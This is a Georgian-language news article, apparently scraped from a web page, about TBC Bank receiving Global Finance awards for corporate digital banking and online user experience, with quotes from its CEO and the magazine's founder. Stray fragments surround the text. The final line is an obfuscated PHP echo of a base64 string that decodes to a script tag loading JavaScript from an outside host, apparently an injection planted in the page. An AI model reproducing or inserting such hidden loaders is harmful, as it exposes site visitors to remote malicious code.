celsiusi
ავერსი შნაიდერი

საერთაშორისო ბიზნესგამოცემა Global Finance-სგან თიბისიმ რამდენიმე ჯილდო მიიღო, მათ შორის,

საუკეთესო კორპორაციული ციფრული ბანკი ცენტრალურ და აღმოსავლეთ ევროპაში და საუკეთესო კორპორაციული ონლაინ UX (სამომხმარებლო გამოცდილება) მსოფლიოში.

„თიბისისთვის როგორც ტექნოლოგიური კომპანიისთვის, განსაკუთრებით საამაყოა ამ ჯილდოების მიღება. ჩვენი ციფრული კორპორაციული ბანკი საუკეთესოდ აღიარეს ცენტრალური და აღმოსავლეთ ევროპაში. გარდა ამისა, ჩვენ ვქმნით საუკეთესო სამომხმარებლო გამოცდილებას მსოფლიოში. განსაკუთრებით გვიხარია ეს წარმატება, რადგან ჩვენთან ერთად ამ კატეგორიებში მსოფლიოს წამყვანი ბანკები მონაწილეობდნენ. ვფიქრობ, ეს ჯილდოები ჩვენი გუნდის დამსახურებაა, რომელიც ყოველდღიურად ქმნის და სთავაზობს მომხმარებლებს ციფრულ პროდუქტებსა და მომსახურებას,“ - ვახტანგ ბუცხრიკიძე, თიბისის გენერალური დირექტორი.

თიბისის მიერ მოპოვებული ჯილდოები ისეთი კრიტერიუმების საფუძველზე იყო შეფასებული, როგორებიც არის საუკეთესო ციფრული სტრატეგია, ციფრული შეთავაზებების მაღალი ხარისხი და აქტუალურობა, ციფრული პროდუქტების ფართო არჩევანი, არხების დიზაინი და ფუნქციონალი.

„ხელოვნური ინტელექტისა და მანქანური სწავლების სწრაფად წინსვლის პირობებში, საუკეთესო ციფრული შეთავაზებების სტანდარტები მუდმივად ვითარდება. ფინანსურ ინსტიტუტებს კი დიგიტალიზაციის გზაზე მოწინავე პოზიციები უკავიათ“, - ჯოზეფ ჯარაპუტო, Global Finance-ის დამფუძნებელი და რედაქტორი.

ბოლო წლებში, ციფრულ არხებში მომსახურებას განსაკუთრებით დიდი როლი აქვს მომხმარებლის ცხოვრებაში. თიბისისთვის გაციფრულება სტრატეგიული მიმართულებაა, რომელსაც თიბისის გუნდი ყოველდღე ავითარებს იმისთვის, რომ ადამიანების ცხოვრება მაქსიმალურად გამარტივდეს.

Global Finance-ი ერთ-ერთი ყველაზე ძველი და რეპუტაციული გამოცემაა, რომელსაც მსოფლიოს 190 ქვეყანაში ადევნებენ თვალს. უკვე 36 წელია, რაც დამოუკიდებელი ჟიური სხვადასხვა კატეგორიაში აფასებს და აჯილდოებს ფინანსურ ინსტიტუტებს.

238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");